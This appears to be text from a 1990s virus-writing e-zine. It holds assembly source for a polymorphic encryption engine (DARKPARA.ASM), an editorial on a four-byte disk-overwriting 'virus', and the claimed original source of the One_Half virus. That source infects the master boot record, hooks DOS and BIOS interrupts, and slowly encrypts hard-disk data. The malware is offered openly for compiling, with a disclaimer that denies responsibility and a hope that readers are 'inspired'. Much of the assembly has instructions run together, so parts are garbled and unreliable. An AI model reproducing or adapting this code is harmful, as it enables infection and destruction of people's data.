CROSS_TAB:mov ax , 0retnmov ax , 0retnmov ax , offset mem2regretnmov ax , offset mem2stackretnmov ax , offset mem2segretnmov ax , offset const2memretnmov ax , 0retnmov ax , offset const2regretnmov ax , 0retnmov ax , 0retnmov ax , offset reg2memretnmov ax , 0retnmov ax , offset reg2regretnmov ax , offset reg2stackretnmov ax , offset reg2segretnmov ax , offset stack2memretnmov ax , 0retnmov ax , offset stack2regretnmov ax , 0retnmov ax , offset stack2segretnmov ax , offset seg2memretnmov ax , 0retnmov ax , offset seg2regretnmov ax , offset seg2stackretnmov ax , 0retn
mem2reg: mov al ,[ si ] .mcm_segcall drop_prefixmov al , 8Bh ; mov reg16,[mem16]mov ah,[ si +4+1]
shl ah, 3
DARKPARA.ASM
jmp orah
mem2stack : mov al ,[ si ] .mcm_segcall drop_prefixmov ax , 30ffh ; push [mem16]jmp orah
mem2seg:mov al ,[ si ] .mcm_segcall drop_prefixmov al , 08Eh ; mov seg,[mem16]mov ah,[ si +4+1]sub ah, 6jmp orah
const2mem : lodswlodsw ; add si,4
mov al ,[ si ] .mcm_segcall drop_prefixmov ax , 00c7hcall orahmov ax ,[ si - 4] .mcc_valcmp ax , MKjne cm_okmov [ ent__ ], dimov ax ,[ b2]add [ ent__ ], axmov ax ,[ __entry ]
cm_ok: stoswretn
const2reg : mov al ,[ si +4+1]cmp [ si ] .mcc_val , 0jne c2r2mov dl , 9mul dlxchg ah, alcall decisionjz c2r3or ax , 0c033h ; xor reg,regjmp c2rc
c2r3 :or ax , 0c02bh ; sub reg,regjmp c2rc
c2r2 :add al , 0B8h ; mov reg16,imm16stosbmov ax ,[ si ] .mcc_val
c2rc : stoswretn
reg2mem: lodswlodsw ; add si,4mov al ,[ si ] .mcm_segcall drop_prefixmov al , 89h ; mov [mem16],reg16mov ah,[ si - 4+1]
shl ah, 3
DARKPARA.ASM
jmp orah
reg2reg : mov ah,[ si +4+1]cmp ah,[ si +1]je r2r_shl ah, 3or ah,[ si +1]or ah, 0c0hmov al , 8bhstosw
r2r_ : retn
reg2stack : mov al ,[ si +1]add al , 50h ; push reg16stosbretn
reg2seg :mov al , 08eh ; mov seg,reg16mov ah,[ si +4+1]
r2_c2 : add ah,[ si +1]add ah, 0c0h - 6stoswretn
stack2mem : lodswlodswmov al ,[ si ] .mcm_segcall drop_prefixmov ax , 008fh ; pop [mem16]jmp orah
stack2reg : mov al ,[ si +4+1]add al , 58h ; pop reg16stosbretn
stack2seg :mov al ,[ si +4+1]inc alstosbretn
seg2mem: lodswlodswmov al ,[ si ] .mcm_segcall drop_prefixmov al , 08ch ; mov seg,[mem16]mov ah,[ si +1- 4]sub ah, 6jmp orah
seg2reg :mov al , 08ch ; mov seg,reg16mov ah,[ si +1]add ah,[ si +4+1]add ah, 0c0h - 6stoswretn
seg2stack :mov al ,[ si +1]
DARKPARA.ASM
stosbretn
drop_prefix : cmp al , DSsje dp_xadd al , 20hstosb
dp_x : retn
random_g_mem: mov ax , 248call randomadd ax , offset gb_memretn
orah : cmp [ lock_ind ], 1jnz ora1call decisionjz ora2
ora1 : or ah, 6stoswmov ax ,[ si ] .mcm_ofsstoswretn
ora2 : or ah,[ mind ]stoswmov ax ,[ si ] .mcm_ofssub ax ,[ ug]stoswretn
COMl macro s0 , s1 , s2 , s3mov ax ,& s0 +&s1 * 100hmov bx ,& s2 +&s3 * 100hendm
COMh macro d0, d1, d2, d3mov cx ,& d0+&d1* 100hmov dx ,& d2+&d3* 100hcall recurserendm
COMx macro s0 , s1 , s2 , s3 , d0, d1, d2, d3mov ax ,& s0 +&s1 * 100hmov bx ,& s2 +&s3 * 100hmov cx ,& d0+&d1* 100hmov dx ,& d2+&d3* 100hcall recurserendm
cx_size equ 4* 3+1
get_random_reg :mov ax , 7call randomtest al , 4jz grrinc al
grr : retn
gen_em: call get_random_regmov [ use_reg ], al
gend : call get_indcmp al ,[ use_reg ]je gend
DARKPARA.ASM
mov [ indy ], alcall reg2adror al , 80hmov [ mind ], almov [ lock_reg ], 1mov [ lock_ind ], 2
retn
gen_disable :
call gen_emmov ax , offset disable_datacall gen_cmov al , 0CFhstosbretn
gen_enable :call gen_emmov ax , offset enable_datacall gen_cmov al , 0CFhstosb
retn
gen_c : cldpush dimov si , offset buf2
sl : call axsx : mov byte ptr [ si ], 0ffh
pop dimov si , offset buf2call compilerretn
enable_data :mov al , t_regmov ah,[ use_reg ]COMh t_stack , 0, 0, 0mov al , t_regmov ah,[ indy ]COMh t_stack , 0, 0, 0call random0xchg ax , bxmov al , t_constmov [ ug], bxmov cl , t_regmov ch ,[ indy ]call recurserCOMx t_seg , DSs, 0, 0 t_stack , 0, 0, 0COMx t_const , 0, 0, 0 t_seg , DSs, 0, 0COMl t_mem, DSs, 4, 0mov cx , t_mem+100h * CSsmov dx ,[ __old_1 ]call recurserCOMl t_mem, DSs, 6, 0mov cx , t_mem+100h * CSsmov dx ,[ __old_1 ]inc dxinc dxcall recurser
DARKPARA.ASM
mov ax , t_mem+256* CSsmov bx ,[ __engine ]COMh t_mem, DSs, 4, 0COMx t_seg , CSs, 0, 0, t_mem, DSs, 6, 0COMx t_stack , 0, 0, 0, t_seg , DSs, 0, 0COMl t_stack , 0, 0, 0mov cl , t_regmov ch ,[ indy ]call recurserCOMl t_stack , 0, 0, 0mov cl , t_regmov ch ,[ use_reg ]call recurser
aax : mov ax , 1000h ; 0..0fff OF DF IF TF SF ZFcall randomor ah, 3mov bx , axmov al , t_constmov cl , t_stackdec [ lock_reg ]call recurser
COMx t_seg , CSs, 0, 0, t_stack , 0, 0, 0mov al , t_constmov bx , MKCOMh t_stack , 0, 0, 0retn
disable_data :mov al , t_regmov ah,[ use_reg ]COMh t_stack , 0, 0, 0mov al , t_regmov ah,[ indy ]COMh t_stack , 0, 0, 0call random0xchg ax , bxmov al , t_constmov [ ug], bxmov cl , t_regmov ch ,[ indy ]call recurserCOMx t_seg , DSs, 0, 0 t_stack , 0, 0, 0COMx t_const , 0, 0, 0 t_seg , DSs, 0, 0mov ax , t_mem+100h * CSsmov bx ,[ __old_1 ]COMh t_mem, DSs, 4, 0mov ax , t_mem+100h * CSsmov bx ,[ __old_1 ]inc bxinc bxCOMh t_mem, DSs, 6, 0
COMx t_stack , 0, 0, 0 t_seg , DSs, 0, 0COMl t_stack , 0, 0, 0mov cl , t_regmov ch ,[ indy ]call recurserCOMl t_stack , 0, 0, 0mov cl , t_reg
DARKPARA.ASM
mov ch ,[ use_reg ]call recurserretn
gen_engine :cldcall gen01jmp pushq
mk1: jmp gen02mk6: retn
get_ind : mov ax , 3call random
jnz g1xsub al , 2
g1x : add al , 5retn
gen01 : call get_indmov [ i0 ], al
g1a : call get_indcmp [ i0 ], alje g1amov [ i1 ], alcall get_indmov [ i2 ], alcall decisionmov [ s0 ], alretn
pushq : mov [ sp1 ], spmov dx , spsub ah, ahcldmov si , offset i0mov cl , 100h - 3
pq0 : lodsbor al , 50hcall isinje pq6push ax
pq6 : inc cljnz pq0
pq2 : mov al ,[ si ]call seg_pushadd al , 6push ax
mov bx , spmov dx ,[ sp1 ]sub dx , bxcall chaos
mov si ,[ sp1 ]
pq3 : dec sidec simov al , ss :[ si ]stosbcmp si , spjne pq3jmp mk1
DARKPARA.ASM
popq :pq5 : pop ax
inc altest al , 40hjz pq4add al , 7
pq4 : stosbcmp [ sp1 ], spjne pq5jmp mk2
gen02 : mov [ sp2 ], spxor si , simov cl , 100h - 4push sipush si
g2a : push silodswinc cljnz g2amov ax , 5call randomadd ax , 2xchg cx , ax
g2b : mov ax , 7call randompush axdec cxjnz g2b
mov bx , spmov dx ,[ sp2 ]sub dx , bxcall chaos
mk3: mov si , offset buf2mov al ,[ i0 ]mov [ use_reg ], almov ax , t_seg +100h * CSsmov cl , almov ch , DSscall recurser
mov ch ,[ i1 ]mov [ use_reg ], ch
mov ch ,[ i0 ]mov cl , t_regmov ax , t_reg +4* 256call recurser
mov ch ,[ i1 ]mov ax , t_mem+100h * CSsmov bx ,[ __oldptr ]mov cl , t_regcall recurser
mov byte ptr [ si ], 0ffhmov si , offset buf2call compiler
DARKPARA.ASM
mov [ ec_new ], dimov [ neg00 ], 0mov al ,[ i1 ]call reg2adr
xx2 : mov [ adr00 ], almov al ,[ s0 ]mov [ seg00 ], al
mov si , spmov [ sp3 ], sicld
xx1 : lods word ptr ss :[ si ]mov [ ofs00 ], alpush word ptr [ rseed ]push word ptr [ rseed +2]mov al ,[ i1 ]
xx3 : mov [ reg00 ], alcall gen00cmp si ,[ sp2 ]jne xx1mov [ ecn_end ], di
mov al ,[ i0 ]call reg2adrmov ah,byte ptr [ sp1 ]sub ah,byte ptr [ sp2 ]xchg ax , bx
call decisionjz fuck_1
mov ax , 08b36hstosw
xchg ax , bxmov bl ,[ i2 ]shl bl , 3or al , 01000000bor al , bl
stoswjmp short fuck_2
fuck_1 : mov ax , 0ff36hstoswxchg ax , bxor al , 070hstoswmov ch ,[ i2 ]mov [ use_reg ], ch
mov ax , t_stackmov cl , t_regmov si , offset buf2call recurser
mov byte ptr [ si ], 0ffhmov si , offset buf2call compiler
fuck_2 :mov [ dc_new ], di
mov [ neg00 ], 1
mov al ,[ i2 ]call reg2adr
DARKPARA.ASM
xb2 : mov [ adr00 ], almov al ,[ s0 ]mov [ seg00 ], al
mov si ,[ sp2 ]xb1 : dec si
dec simov ax , ss :[ si ]mov [ ofs00 ], alpop word ptr [ rseed +2]pop word ptr [ rseed ]mov al ,[ i2 ]mov [ reg00 ], al
call gen00cmp si ,[ sp3 ]jne xb1mov ax ,[ sp2 ]sub ax , spadd sp , axmov [ dcn_end ], dimov ah,[ i2 ]mov [ use_reg ], ahmov si , offset buf2mov cx , t_mem+100h * CSsmov dx ,[ __oldptr ]mov al , t_reg
call recursermov byte ptr [ si ], 0ffhmov si , offset buf2call compiler
jmp popqmk2: mov al , 0cfh
stosbjmp mk6
gen00 : mov ax , 4call randomor al , aljnz g0dmov al , 2ehjmp g0c
g0d : mov al ,[ seg00 ]or al , aljnz g0emov al , 26h
g0c : stosbg0e :
mov ax , tab00size * 4call randomand al , 0fch
mov bx , axadd ax , offset tab00call ax
mov dl ,[ neg00 ]test ah, dljz g0hxor bl , 4
mov ax , bx
DARKPARA.ASM
add ax , offset tab00call ax
g0h : and ah, 0fehor ah,[ adr00 ]cmp bl , offset trg00 - offset tab00jae g0gmov dl ,[ reg00 ]shl dl , 3or ah, dl
g0g : cmp [ ofs00 ], 0jne g0aand ah, 03fhstoswjmp g0f
g0a : stoswmov al ,[ ofs00 ]stosb
g0f : cmp bl , offset tim00 - offset tab00jb g0bcall random0stosw
g0b : retn
tab00 : db 0B8h, 001h , 01000001b , 0c3h ; add ,regdb 0B8h, 029h , 01000001b , 0c3h ; subdb 0B8h, 031h , 01000000b , 0c3h ; xor
trg00 :db 0b8h , 0f7h , 01011000b , 0c3h ; negdb 0b8h , 0ffh , 01000001b , 0c3h ; incdb 0b8h , 0ffh , 01001001b , 0c3h ; decdb 0b8h , 0d0h , 01000001b , 0c3h ; rol ,1 - bytedb 0b8h , 0d0h , 01001001b , 0c3h ; ror ,1 - bytedb 0b8h , 0f7h , 01010000b , 0c3h ; not
tim00 :db 0b8h , 081h , 01110000b , 0c3h ; xordb 0b8h , 081h , 01000001b , 0c3h ; add ,immwdb 0b8h , 081h , 01101001b , 0c3h ; sub
tab00end labeltab00size equ ( offset tab00end - offset tab00 )/ 4
chaos : pushapush dspush sspop dsmov cx , dx
ch0 : mov ax , dxcall randomand al , 0fehmov si , axmov ax , dxcall randomand al , 0fehmov di , axmov ax ,[ si +bx ]xchg ax ,[ di +bx ]mov [ si +bx ], axdec cxjnz ch0pop dspopa
DARKPARA.ASM
retn
isin : pushamov si , spadd si , 16+2
ii1 : cmp si , dxje ii2cmp ss :[ si ], axje ii0inc siinc sijmp ii1
ii2 : inc siii0 : popa
retn
seg_push :or al , aljz sp_xxmov al , 18h
sp_xx : retn
reg2adr :sub al , 2cmp al , 1jne r2amov al , 7
r2a : retn
getlost_po : mov ax ,[ dcn_end ]add ax ,[ b2]mov [ dco_end ], axmov ax ,[ dc_new ]add ax ,[ b2]mov [ dc_old ], ax
mov si ,[ __old_1 ]mov [ old1_ofs ], sipop [ si +2]pop [ si ]mov ax ,[ m1]mov [ si +4], ax
call gen_preintonmt : mov ax , 18h
call randomadd al , 40hcmp al , 50hjb okaaadd al , 40h
okaa : mov byte ptr [ start_v ], aland al , 7cmp al , 4je onmtpush cspop esmov si , offset rcptmov di , offset safemovswmovsb
DARKPARA.ASM
mov cx ,[ bitch ]call fake_segxor di , dixor si , sishr cx , 1rep movswmov di , cs :[ bitch ]add di , decr_codemov cx , offset c_aft +1sub cx , dishr cx , 1rep movsw
call fake_segxor si , simov di , offset c_aftmov cx , cs :[ __old_1 ]sub cx , direp movsbadd di , gb_lenmov cx , offset start_vsub cx , direp movsbmov di , offset dil_heapmov cx , dil_len / 2rep movswcall cr_randomize
push cspop ds
retn
MORPH: pushamov di , spmov cl , 0mov al , 0ffhdb 'ENGINE OF ETERNAL ENCRYPTION'mov ax , disub ax , spadd sp , axpopa
call POWERUPpush cspop ds
mov al ,byte ptr [ dis_val ]mov byte ptr [ rcpt ], al
pre_prepare : call dil_genmov si ,[ old1_ofs ]push [ si ]push [ si +2]
push cspop ds
mov ax , spshr ax , 4
DARKPARA.ASM
mov bx , ssadd ax , bxadd ax , ss_distance
mov [ empty_seg ], axmov si ,[ ecn_end ]push [ si ]mov byte ptr [ si ], 0c3hxor ax , axmov es , axmov [ sp_tmp ], sppushapusha
push TFpush cspush offset start_v +1mov si ,[ dco_end ]mov [ oldptr_2 ], offset pred +1
push offset prepare_re
push 0push cspush offset rcpt
END_offset : iretnop
db Maxinst dup (?)endv :heapbeg :
block_beg dw offset block - offset startblock_len dw 1
dc_old dw offset dc_oldxdco_end dw offset dc_oldx
old1_ofs dw offset old1disable__ dw offset disable
old_ss dw ?old_sp dw ?old_ip dw ?old_cs dw ?
ent__ dw offset ent_ +1bitch dw 100hdis_val : retn
data_12e :
d_beg :rcpt :rcBUF db 8+2 dup (?)UMB_link dw ?UMB_strategy dw ?
old_21 dd ?d_end :dataend :block : retn
DARKPARA.ASM
dil_len equ 12aeh - 1199h +1+4getlost labelprepare_re equ getlost +59hreCRYPT equ getlost +69hdil_heap db dil_len dup (?)ec_new dw ?dc_new dw ?ecn_end dw ?dcn_end dw ?temp_seg dw ?b2 dw ? ; bitch IIsafe db 3 dup (?)
oldptr_2 dw ?m1 dw ?len_add dw ?new_enable db decr_code dup (?)
sp_tmp dw ?time dw ?date dw ?buffer db headerlen dup (?)create dw ?empty_seg dw ?hook21 dw ?,?
seg00 db ?reg00 db ?adr00 db ?ofs00 db ?neg00 db ?
i0 db ?i1 db ?i2 db ?s0 db ?
sp1 dw ?sp2 dw ?sp3 dw ?
use_reg db ?indy db ?mind db ?ug dw ?lock_ind db ?lock_reg db ?temp dw ?buf2 db 400h dup (?)
__old_1 dw ?__entry dw ?__engine dw ?__oldptr dw ?__ks dw ?
rseed dw ?,?rtemp dw ?
heapend :temp_buf :
DARKPARA.ASM
end start
The Ultimate SolutionThe world smalest virus ever.
Editorial.So dudes here is another kick the ass contribution to our zine. Smalest virus in sa world.Enjoy it and don't get infected. So pay attention on your A: drive. Maybe, you get the feelingthe contribution is unreal, but remember this is no AF edition....
So enjoy the article by Vyvojar
Kyjacisko alias Budzogan
Halloa.The smallest virus ever comes. From Slovakia, of course. From Vyvojar, of course. It's sosmall it can spread oraly. Just tell your friend 8B DE CD 26 and there it is - replicated. Now.The xtra quick intro to writing a virus. All you need is two instructions. First one is variable(polymorphism of fundamental level). So, whether you write 8B DE or B7 01 it doesn't matterthat much and the conversation gets more colorful. All you need to get across is to put theright values into right register (the one and only BX). So and one half is done. Press any keyto continue... Second instruction is, unfortunatelly, not polymorphic, but it works. It goes CD 26and simply tells the machine to spread the virus. Virus is now replicated - hopefuly. Extrabonus: it's stealth (a little bit). And heuristics doesn't stand a chance. Possibly it infectsarchives as well (ZIP, ARJ, RAR etc.) ...
What history tells us.The first attempts to write a short virus date far back. Most of them are overwritting non-TSRtings. There has been a conference (virus-l) on intnet and they concluded the smallest everwas some Trivial.22 chap (gosh, 500% bigger than Kyjacisko).
Note for non-Slovak residents: if you don't know what Kyjacisko (Budzogan respectively)means, consult the Slovak embassy near you. If you don't know who Vyvojar is, you are notsupposed to read this mag anyway.
.
The serious part.Requirements: Works exclusively with MS-DOS, tested with 5.0+ (no win business, folks).Requires 4b free RAM (except for PSP and tings like that). First instruction sets BX register to100h. You can achieve tis in several different ways. EG mov bx,si (A alternative), mov bh,01(alt B) etc etc. Second instruction runs int 26h. Now, we need several tings for tis interrupt.Following registers should be set like dis:
AL contains disk drive number.ES:BX buffer to be written down.CX number of sectors to be written.DX logical sector number. Dis is all for today.
And now, let's see how did Microsoft set the registers for us.AL = 0 (mostly) ........................... documentedBX = AX = 0 (we set to 100h, remember?) ... undocumentedCX = FFh .................................. undocumentedDX = ES = PSP segment = base address ...... partially documentedit should be all safe and clear now.
So the virus writes itself (or in fact 255 sectors) somewhere to the disk A:, where "somewhere"is determined by the PSP value. If a starting sector number of .COM or .EXE file is identicalwith DX value, such file gets infected. Often people start panicking like "how will it all end,what a bunch of data will be lost or it isn't a 4B virus when it writes 255 sectors etc etc". Theanswer, my friend is written in the empirical facts of other viruses as well as in the definition ofa virus itself.
OK I'm finished and so is the virus. Code you can get from any good BBS or by fax or by atelephone call from a friend. It is also included in the supplement to tis file.
The motto of the day."As WindowsTM get longer, good things get shorter."
Vyvojar
Donwload here
The only authentic One_Half source code.Exclusively for the *-zine.
EditorialYou may remember the time of its Outbreak. It was horrible, unknown and effective. Itencrypted your data. It was One_Half. Still on the scene, still in the wild, still in the wild list.Here comes the source.
DisclaimerThe code presented below is one of the most successuf virus in the history. It can (undersome circumstances) destroy your data. If you compile it, its on you what you 'll do with theexacutable file. We don't care. Guilty for any damage is that asshole, who executes it.
Dear friendssome time has already passed since the great days of One Half epidemy.Nevertheless westill hope that a code of this popular virus inspires you also now. A lot of stuff has been writtenon the subject, so I tink, not many words are necessary about this little creature any more.And, so, here is the original source of One_Half.3577.
Vyvojar
OneHalf.3544OneHalf aka Slovak Bomber aka Explosion II is multipartite resident com'n'exe virus. Wheninfected file is executed, OneHalf infects the MBR of the harddisk. The original contens ofMBR 'll be stored on track 0, on in the 8th sector, when we count from the last one. MBR 'll bealtered and the viral body 'll be placed in last 7 sectors of track 0. Then OneHalf looks for lastactive DOS partition table (or extended patrition table). Then number of first and last sector ofthis partition 'll be computed and stored at offset 29h in MBR. Starting from this moment, onevery system reboot virus subtract this variable by 2 and encrypts 2 cylinders which arepointed by this variable. This means very slow disk encryption. The encrypted areas on diskare decrypted on demand, but only when virus is memory resident. Attempts to remove virusvia clean boot and FDISK /MBR are the best way to lost your data. I just forgot to say, thatOneHalf is stealth virus. Onehalf infect files on floppy discs and network drives, but not on thelocal hard drive. This is very good and effective strategy of spreading. We were told, the viruswas in the very beginnig planted in the field on 3 computers in university lab. And look - now itis spread world wide.
.
In the infected file, the virus decryptor is divided into 10 parts, which are spread across wholethe infected file. These parts are connected together by 2 types of jumps and of course, thereare here some garbage instruction, randomly choosed from 10 possibles.
When one half of the disk is encrypted, virus, depending on the system date and generationprints to the screen following message:
Dis is one half.Press any key to continue...
The body contains also string "Did you leave the room ?", related to Explosion virus by thesame author.
Download here
ONE_HALF.ASM
;Dear friends,;some time has already passed since the great days of One Half epidemy.;Nevertheless we still hope that a code of this pop ular virus inspires;you also now. A lot of stuff has been written on t he subject, so I tink,;not many words are necessary about this little cre ature any more.;And, so, here is the original source of One_Half.3 577:
DOSSEG.MODEL SMALL.STACK 100h
Vkod SEGMENT'kod'ASSUME CS: Vkod, DS: Vkod
stvir LABEL nearPOCKIL=4 ;virus length in kB
DB 05ahowner DW ?
DW POCKIL* 1024 / 16- 1DB 00h , 00h , 00h , 'COMMAND', 00h ;MCB header
DLZVIR=( OFFSET endvir - OFFSET stvir ) ;virus lengthPOCSEC=(( DLZVIR- 1)/ 512+1) ;number of sectors neededPOCINS=10 ;number of instructionsDLZINS=10 ;instruction lengthDLZBUFF=512 ;buffer lengthDLZZAS=81h ;stack lengthVRCHOL=( OFFSET endvir +DLZBUFF+DLZZAS) ;topPOCTRACK=2 ;track numberDLZFNB=64 ;file name max. length
strc STRUCid DW ?lpage DW ?pages DW ?items DW ?parps DW ?min DW ?max DW ?vSS DW ?vSP DW ?flag DB ?
DB ? ;check DW ?vIP DW ?vCS DW ?iaddr DW ?
strc ENDS
bheader strc <>poss DW POCINS DUP(?)posss DW ? ;positions of instructionsorprg DB POCINS* DLZINS DUP(?)
v16 DW 16v30 DW 30v512 DW 512
;************ MBOOT ************sboot : xor bx , bx
climov sp , 7c00hmov ss , bxsti
ONE_HALF.ASM
mov ds , bxsub word ptr ds : 0413h , POCKILmov cl , 6int 12hshl ax , clmov dx , 0080hmov es , ax
sector : mov cx , 0009hmov ax ,( 0200h +POCSEC)
push esint 13h
bootid : mov ax , OFFSET stabootpush axretf
eboot LABEL near;******************************staboot : mov ds :( 4* 21h+2), cs
mov ax , ds : 046chpush dspush cspop dsmov rnd1 , ax ;RNG initmov ax , csinc axmov owner , ax ;MCB owner settingmov byte ptr ds :( OFFSET con3 +1), 00h ;condition for memory
call Koppr ;copying of needed routines
pop esmov bx , sppush esmov si , es :( bx +OFFSET eboot - OFFSET sboot )
zactr : cmp si , 500 ;everything encoded ?jbe uznkpush sisub si , POCTRACKmov word ptr ds :( OFFSET cdft +2), si ;last trackpop simov ah, 08hint 13hjc uznkmov al , cland al , 3fh ;al = number of sectorsmov kolzak , al ;number of sectors to encodemov cl , 01hmov bh, 7ehmov odkzak , bx ;start to encode frommov dl , 80h
nttrc : dec sicall Fromsipush dx
nthd : mov ah, 02hpush axint 13hpop axjc perwdcall Skrambinc ahpush axint 13hpop ax
perwd : jc erwd
ONE_HALF.ASM
test dh, 3fhjz tciddec dhjmp nthd
tcid : pop dxcdft : cmp si , 100h ;last track
ja nttrcjfcor : mov bh, 7ch
mov es :( bx +OFFSET eboot - OFFSET sboot ), simov ax , 0301hmov cx , 0001hmov dh, chint 13h
uznk : mov word ptr ds :( OFFSET cnflte +2), si ;for condition in res13aktcd : sub si , 613
ja estnecmp si ,-( 3* POCTRACK- 1)jb estne ;write it out 3xcall Prejav
estne : mov ax , 0201hmov bx , 7c00hmov cx ,word ptr ds :( OFFSET sector +1)dec cxmov dx , 0080hint 13h ;read original bootcliles ax , es :( 4* 13h )mov word ptr oriv13 , axmov word ptr oriv13 +2, espop espush esles ax , es :( 4* 1ch )mov word ptr oriv1c , axmov word ptr oriv1c +2, espop espush esmov word ptr es :( 4* 13h ), OFFSET res13mov es :( 4* 13h+2), csmov word ptr es :( 4* 1ch ), OFFSET res1cmov es :( 4* 1ch +2), cs ;hook 13h and timer 1chstipush bxretf
erwd : xor ah, ah ;decode last track if errorpush axint 13hpop ax
enthd : inc dhmov ah, dhpop dxpush dxcmp ah, dhja ercormov dh, ahmov ah, 02hpush axint 13hpop axcall Skrambinc ah
ONE_HALF.ASM
push axint 13hpop axjmp enthd
ercor : pop dxinc sijmp jfcor
res1c : push axpush dspush esxor ax , axmov ds , axles ax , ds :( 4* 21h )mov word ptr cs : oriv21 , axmov ax , escmp ax , 0800hja chnpmov word ptr cs :( oriv21 +2), axles ax , cs : oriv1cmov ds :( 4* 1ch ), axmov ds :( 4* 1ch +2), es ;unhook 1chmov ds :( 4* 21h ), OFFSET res21mov ds :( 4* 21h+2), cs ;hook 21h
chnp : pop espop dspop axDB 0eah ;jump to original 1ch
oriv1c DD ?
Koppr PROC nearmov si , OFFSET zZakoduj
mov di , OFFSET Zakodujmov cx , OFFSET kzZak - OFFSET zZakodujcldrep movsb ;copy needed routinesret
Koppr ENDP
Fromsi PROC nearpush axmov ax , simov ch , alpush cxmov cl , 4shl ah, clpop cxmov al , 3fhand dh, aland cl , alnot alpush axand ah, alor dh, ahpop axshl ah, 1shl ah, 1and ah, alor cl , ahpop axret
Fromsi ENDP
ONE_HALF.ASM
mess1 DB 'Dis is one half.' , 0dh , 0ah , 'Press any key to continue ...' , 0dh , 0ahems1 LABEL byte
Prejav PROC neartest order , 11b ;only generations that are multiple of 4jnz somewhere_in_townmov cx , OFFSET ems1- OFFSET mess1mov si , OFFSET mess1mov ah, 0fhint 10hmov bl , 07hmov ah, 0eh
freddey_lives :lodsbint 10hloop freddey_livesxor ah, ahint 16h
somewhere_in_town :ret
Prejav ENDP
;**************** file part **************Pmip PROC near
push bxDB 0bbh
handle1 DW ? ;mov bx,handle1int 21hpop bxret
Pmip ENDP
tInt13 PROC nearpushfcliDB 09ah
toriv13 DD ?ret
tInt13 ENDP
res01 : push bpmov bp, sp
con2 : jmp short r1cnr1cn : cmp word ptr [ bp+04h ], 1234h
ja nsyetpush axpush bxpush dslds ax ,[ bp+02h ]DB 0bbh
rlit DW ?mov word ptr cs :[ bx +OFFSET toriv13 ], axmov word ptr cs :[ bx +OFFSET toriv13 +2], dsmov byte ptr cs :[ bx +OFFSET con2 +1], OFFSET syet - OFFSET r1cn ;set conditionpop dspop bxpop ax
syet : and byte ptr [ bp+07h ], 0fehnsyet : pop bp
iret;**************** instalation to memory *********** *******
ONE_HALF.ASM
instm : pop bxpop axpush ax ;ax = PSP
dec axmov ds , axcmp byte ptr ds :[ 00h ], 'Z'jne inchb
add ax , ds :[ 03h ]sub ax ,( POCKIL* 1024 )/ 16- 1 ;ax = virus segmentmov dx , csmov si , bx
dec simov cl , 4
shr si , clinc si ;si = paragraph count till beginningadd dx , si
add dx , cs :[ bx +OFFSET bheader.min ] ;min memory requestcmp ax , dxjb inchb ;not enough room in memorymov dx , ssmov si , spadd si , 3shr si , clinc siadd dx , sicmp ax , dxjb inchb
mov byte ptr ds :[ 00h ], 'M'sub word ptr ds :[ 03h ],( POCKIL* 1024 )/ 16mov ds :[ 12h ], axmov es , axpush cspop dsinc axmov word ptr [ bx +OFFSET owner ], axmov byte ptr [ bx +OFFSET vsetky ], 0ebh ;infect everywheremov si , bxxor di , dimov cx , DLZVIRrep movsb
push espop ds
call Koppr ;copy needed routinesxor ax , axmov ds , axclimov ax , ds :( 4* 21h )mov word ptr es : oriv21 , axmov ax , ds :( 4* 21h+2)mov word ptr es :( oriv21 +2), axmov word ptr ds :( 4* 21h ), OFFSET res21mov ds :( 4* 21h+2), essti
inchb : jmp aalldn
start LABEL nearstsub : call nextnext : pop si
sub si , OFFSET nextmov [ si +OFFSET rlit ], si ;relocation in trace
ONE_HALF.ASM
push espush sicld
inc word ptr [ si +OFFSET order ] ;generationmov byte ptr [ si +OFFSET vsetky ], 74h ;dis is jz ...xor ax , axmov es , axmov ax , es : 046chmov [ si +OFFSET rnd1 ], ax ;init RNGmov [ si +OFFSET zls1 +3], ax ;key for HD encoding
mov ax , 4b53hint 21hcmp ax , 454bhje palldn
mov ah, 52hint 21hmov ax , es :[ bx - 02h ]mov word ptr ds :[ si +OFFSET r1cn +3], ax ;limitmov byte ptr ds :[ si +OFFSET con2 +1], 00h ;set conditionmov ax , 3501hint 21hpush bxpush esmov ax , 3513hint 21hmov word ptr [ si +OFFSET toriv13 ], bxmov word ptr [ si +OFFSET toriv13 +2], esmov ax , 2501hlea dx ,[ si +OFFSET res01 ]int 21hlea bx ,[ si +OFFSET endvir ]mov cx , 0001hmov dx , 0080hpush cspop espushfpop axor ah, 01hpush axpopfmov ax , 0201hcall tInt13pushfpop axand ah, 0fehpush axpopfpop dspop dxpushf
mov ax , 2501hint 21hpopfjc pinstmpush cspop dscmp word ptr [ bx +( OFFSET bootid - OFFSET sboot )+ 1], OFFSET stabootjne ov444
palldn : jmp alldn
ONE_HALF.ASM
ov444 : cmp word ptr [ bx +180h ], 072ehje pinstm ;MASTER mboot protectionmov ah, 08hmov dl , 80hcall tInt13jc pinstmand cx , 00111111b ;CL = max. sector numbermov byte ptr ds :( si +OFFSET znxtsc +2), cl ;for res13mov [ si +OFFSET mxskt ], cland dh, 3fhmov [ si +OFFSET mxhlv ], dh ;max. head number for encodingmov ax , 0301hsub cl , POCSEC
mov byte ptr ds :( si +OFFSET zr13ds +2), cl ;for condition in int13mov dx , 0080hcall tInt13 ;save original mbootjc pinstm
push cxpush dxpush sixchg di , simov cx , 4add bx , 1eeh
hlvp : mov al ,[ bx +04h ]cmp al , 01hje ptrifcmp al , 04hjb chdnncmp al , 06hjbe ptrif
chdnn : sub bx , 10hloop hlvppop sipop dxpop cx
pinstm : jmp instmptrif : mov cx ,[ bx +02h ]
mov dh,[ bx +01h ]call zTosiadd si , POCTRACK+5mov [ di +OFFSET zactr +2], si ;cylinder nearer to the beginningxchg ax , simov cx ,[ bx +06h ]mov dh,[ bx +01h ]call zTosimov [ di +OFFSET kontr +2], simov [ di +OFFSET stpdb +1], si ;cylinder nearer to the endadd ax , sishr ax , 1mov [ di +OFFSET aktcd +2], ax ;cylinder to activatepop sipop dxpop cx
mov ax ,( 0300h +POCSEC)xchg bx , siinc cxmov word ptr ds :[ bx +OFFSET sector +1], cxcall tInt13jc pinstmlea si ,[ bx +OFFSET sboot ]
ONE_HALF.ASM
lea di ,[ bx +OFFSET endvir ]push dimov cx , OFFSET eboot - OFFSET sbootrep movsb
stpdb : mov ax , 1234hstoswmov ax , 0301hpop bxmov cx , 0001hcall tInt13jc pinstm
alldn : pop bxaalldn : push cs
pop dspush cspop es
lea si ,[ bx +OFFSET orprg ]add bx , OFFSET possmov cx , POCINS
ssno : mov di ,[ bx ]push cxmov cx , DLZINSrep movsbpop cxinc bxinc bxloop ssno ;restore codepop es
